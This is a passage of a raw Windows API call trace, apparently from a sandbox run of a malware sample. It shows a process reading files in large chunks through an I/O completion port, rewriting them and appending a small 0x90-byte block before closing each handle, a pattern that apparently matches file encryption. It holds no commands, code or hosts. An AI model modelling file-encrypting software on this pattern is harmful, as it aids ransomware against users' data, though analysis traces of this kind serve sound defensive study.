lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4) returned 1 [0148.968] ReadFile (in: hFile=0x614, lpBuffer=0x2f30124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3bdfad0, lpOverlapped=0x2f30020 | out: lpBuffer=0x2f30124, lpNumberOfBytesRead=0x3bdfad0*=0x0, lpOverlapped=0x2f30020) returned 0x0 [0148.968] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4) returned 1 [0148.968] ReadFile (in: hFile=0x674, lpBuffer=0x4280124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3bdfad0, lpOverlapped=0x4280020 | out: lpBuffer=0x4280124, lpNumberOfBytesRead=0x3bdfad0*=0x0, lpOverlapped=0x4280020) returned 0x0 [0148.969] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4) returned 1 [0148.969] ReadFile (in: hFile=0x13c, lpBuffer=0x4700124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3bdfad0, lpOverlapped=0x4700020 | out: lpBuffer=0x4700124, lpNumberOfBytesRead=0x3bdfad0*=0x0, lpOverlapped=0x4700020) returned 0x0 [0148.969] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4) returned 1 [0148.969] ReadFile (in: hFile=0x650, lpBuffer=0x4820124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3bdfad0, lpOverlapped=0x4820020 | out: lpBuffer=0x4820124, lpNumberOfBytesRead=0x3bdfad0*=0x0, lpOverlapped=0x4820020) returned 0x0 [0148.969] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4) returned 1 [0148.969] ReadFile (in: hFile=0x670, lpBuffer=0x4940124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3bdfad0, lpOverlapped=0x4940020 | out: lpBuffer=0x4940124, lpNumberOfBytesRead=0x3bdfad0*=0x0, lpOverlapped=0x4940020) returned 0x0 [0148.969] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4) returned 1 [0148.969] ReadFile (in: hFile=0x634, lpBuffer=0x4a60124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3bdfad0, lpOverlapped=0x4a60020 | out: lpBuffer=0x4a60124, lpNumberOfBytesRead=0x3bdfad0*=0x0, lpOverlapped=0x4a60020) returned 0x0 [0148.969] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4) returned 0 [0148.969] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2f30020) returned 1 [0148.969] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4) returned 0 [0148.969] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4280020) returned 1 [0148.969] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4) returned 0 [0148.969] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4700020) returned 1 [0148.969] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4) returned 0 [0148.969] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4820020) returned 1 [0148.969] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4) returned 0 [0148.969] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4940020) returned 1 [0148.970] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4) returned 0 [0148.970] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4a60020) returned 1 [0148.970] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4) returned 1 [0148.970] WriteFile (in: hFile=0x614, lpBuffer=0x2f30094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x3bdfad0, lpOverlapped=0x2f30020 | out: lpBuffer=0x2f30094*, lpNumberOfBytesWritten=0x3bdfad0, lpOverlapped=0x2f30020) returned 1 [0148.970] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4) returned 1 [0148.970] WriteFile (in: hFile=0x674, lpBuffer=0x4280094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x3bdfad0, lpOverlapped=0x4280020 | out: lpBuffer=0x4280094*, lpNumberOfBytesWritten=0x3bdfad0, lpOverlapped=0x4280020) returned 1 [0148.970] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4) returned 1 [0148.970] WriteFile (in: hFile=0x13c, lpBuffer=0x4700094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x3bdfad0, lpOverlapped=0x4700020 | out: lpBuffer=0x4700094*, lpNumberOfBytesWritten=0x3bdfad0, lpOverlapped=0x4700020) returned 1 [0148.970] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4) returned 1 [0148.970] WriteFile (in: hFile=0x650, lpBuffer=0x4820094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x3bdfad0, lpOverlapped=0x4820020 | out: lpBuffer=0x4820094*, lpNumberOfBytesWritten=0x3bdfad0, lpOverlapped=0x4820020) returned 1 [0148.970] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4) returned 1 [0148.970] WriteFile (in: hFile=0x670, lpBuffer=0x4940094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x3bdfad0, lpOverlapped=0x4940020 | out: lpBuffer=0x4940094*, lpNumberOfBytesWritten=0x3bdfad0, lpOverlapped=0x4940020) returned 1 [0148.970] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4) returned 1 [0148.970] WriteFile (in: hFile=0x634, lpBuffer=0x4a60094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x3bdfad0, lpOverlapped=0x4a60020 | out: lpBuffer=0x4a60094*, lpNumberOfBytesWritten=0x3bdfad0, lpOverlapped=0x4a60020) returned 1 [0148.970] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4) returned 1 [0148.971] CloseHandle (hObject=0x614) returned 1 [0148.972] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x2f30020) returned 1 [0148.990] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4) returned 1 [0149.031] CloseHandle (hObject=0x13c) returned 1 [0149.058] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4700020) returned 1 [0149.058] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4) returned 1 [0150.021] CloseHandle (hObject=0x658) returned 1 [0150.031] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4dc0020) returned 1 [0150.032] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4) returned 1 [0150.035] CloseHandle (hObject=0x65c) returned 1 [0150.041] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x5240020) returned 1 [0150.041] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4) returned 1 [0150.041] CloseHandle (hObject=0x668) returned 1 [0150.044] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x5480020) returned 1 [0150.044] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4) returned 1 [0150.784] ReadFile (in: hFile=0x134, lpBuffer=0x4940124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3bdfad0, lpOverlapped=0x4940020 | out: lpBuffer=0x4940124*, lpNumberOfBytesRead=0x3bdfad0*=0x0, lpOverlapped=0x4940020) returned 1 [0150.785] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4) returned 1 [0150.790] WriteFile (in: hFile=0x61c, lpBuffer=0x4700124, nNumberOfBytesToWrite=0xee0f, lpNumberOfBytesWritten=0x3bdfad0, lpOverlapped=0x4700020 | out: lpBuffer=0x4700124, lpNumberOfBytesWritten=0x3bdfad0, lpOverlapped=0x4700020) returned 0x0 [0150.809] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4) returned 0 [0150.813] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4700020) returned 1 [0150.813] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4) returned 0 [0150.813] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4820020) returned 1 [0150.813] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4) returned 1 [0150.813] WriteFile (in: hFile=0x644, lpBuffer=0x2f30094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x3bdfad0, lpOverlapped=0x2f30020 | out: lpBuffer=0x2f30094*, lpNumberOfBytesWritten=0x3bdfad0, lpOverlapped=0x2f30020) returned 1 [0150.820] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4) returned 1 [0150.820] WriteFile (in: hFile=0x658, lpBuffer=0x4820094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x3bdfad0, lpOverlapped=0x4820020 | out: lpBuffer=0x4820094*, lpNumberOfBytesWritten=0x3bdfad0, lpOverlapped=0x4820020) returned 1 [0150.830] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4) returned 0 [0150.830] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4a60020) returned 1 [0150.831] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4) returned 1 [0150.831] WriteFile (in: hFile=0x134, lpBuffer=0x4940094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x3bdfad0, lpOverlapped=0x4940020 | out: lpBuffer=0x4940094*, lpNumberOfBytesWritten=0x3bdfad0, lpOverlapped=0x4940020) returned 1 [0150.843] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4) returned 1 [0150.843] WriteFile (in: hFile=0x610, lpBuffer=0x4a60094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x3bdfad0, lpOverlapped=0x4a60020 | out: lpBuffer=0x4a60094*, lpNumberOfBytesWritten=0x3bdfad0, lpOverlapped=0x4a60020) returned 1 [0150.851] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4) returned 1 [0150.851] CloseHandle (hObject=0x610) returned 1 [0150.872] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4a60020) returned 1 [0150.926] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4) returned 1 [0150.926] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3bdfad0, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3bdfad0*=0x0, lpOverlapped=0x41f0020) returned 1 [0150.926] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4) returned 1 [0150.926] ReadFile (in: hFile=0x674, lpBuffer=0x4670124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3bdfad0, lpOverlapped=0x4670020 | out: lpBuffer=0x4670124*, lpNumberOfBytesRead=0x3bdfad0*=0x0, lpOverlapped=0x4670020) returned 1 [0150.927] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4) returned 1 [0150.927] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0xd8c9, lpNumberOfBytesWritten=0x3bdfad0, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3bdfad0, lpOverlapped=0x41f0020) returned 1 [0151.076] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4) returned 1 [0151.076] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3bdfad0, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124, lpNumberOfBytesRead=0x3bdfad0*=0x0, lpOverlapped=0x41f0020) returned 0x0 [0151.076] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4) returned 0 [0151.076] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x41f0020) returned 1 [0151.076] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4) returned 1 [0151.076] WriteFile (in: hFile=0x610, lpBuffer=0x41f0094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x3bdfad0, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0094*, lpNumberOfBytesWritten=0x3bdfad0, lpOverlapped=0x41f0020) returned 1 [0151.093] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4) returned 1 [0151.093] CloseHandle (hObject=0x610) returned 1 [0151.100] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x41f0020) returned 1 [0151.101] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4) returned 1 [0151.197] WriteFile (in: hFile=0x610, lpBuffer=0x4280124*, nNumberOfBytesToWrite=0x3e8b, lpNumberOfBytesWritten=0x3bdfad0, lpOverlapped=0x4280020 | out: lpBuffer=0x4280124*, lpNumberOfBytesWritten=0x3bdfad0, lpOverlapped=0x4280020) returned 1 [0151.290] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4) returned 1 [0151.290] ReadFile (in: hFile=0x610, lpBuffer=0x4280124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3bdfad0, lpOverlapped=0x4280020 | out: lpBuffer=0x4280124, lpNumberOfBytesRead=0x3bdfad0*=0x0, lpOverlapped=0x4280020) returned 0x0 [0151.290] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4) returned 0 [0151.290] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4280020) returned 1 [0151.290] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4) returned 1 [0151.290] WriteFile (in: hFile=0x610, lpBuffer=0x4280094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x3bdfad0, lpOverlapped=0x4280020 | out: lpBuffer=0x4280094*, lpNumberOfBytesWritten=0x3bdfad0, lpOverlapped=0x4280020) returned 1 [0151.309] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4) returned 1 [0151.309] CloseHandle (hObject=0x610) returned 1 [0151.315] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4280020) returned 1 [0151.315] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4) returned 1 [0151.315] ReadFile (in: hFile=0x674, lpBuffer=0x4700124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3bdfad0, lpOverlapped=0x4700020 | out: lpBuffer=0x4700124, lpNumberOfBytesRead=0x3bdfad0*=0x0, lpOverlapped=0x4700020) returned 0x0 [0151.315] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4) returned 0 [0151.315] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4700020) returned 1 [0151.315] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4) returned 1 [0151.316] WriteFile (in: hFile=0x674, lpBuffer=0x4700094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x3bdfad0, lpOverlapped=0x4700020 | out: lpBuffer=0x4700094*, lpNumberOfBytesWritten=0x3bdfad0, lpOverlapped=0x4700020) returned 1 [0151.320] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4) returned 1 [0151.320] CloseHandle (hObject=0x674) returned 1 [0151.323] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4700020) returned 1 [0151.323] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4) returned 1 [0151.394] ReadFile (in: hFile=0x674, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3bdfad0, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3bdfad0*=0x0, lpOverlapped=0x41f0020) returned 1 [0151.394] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, 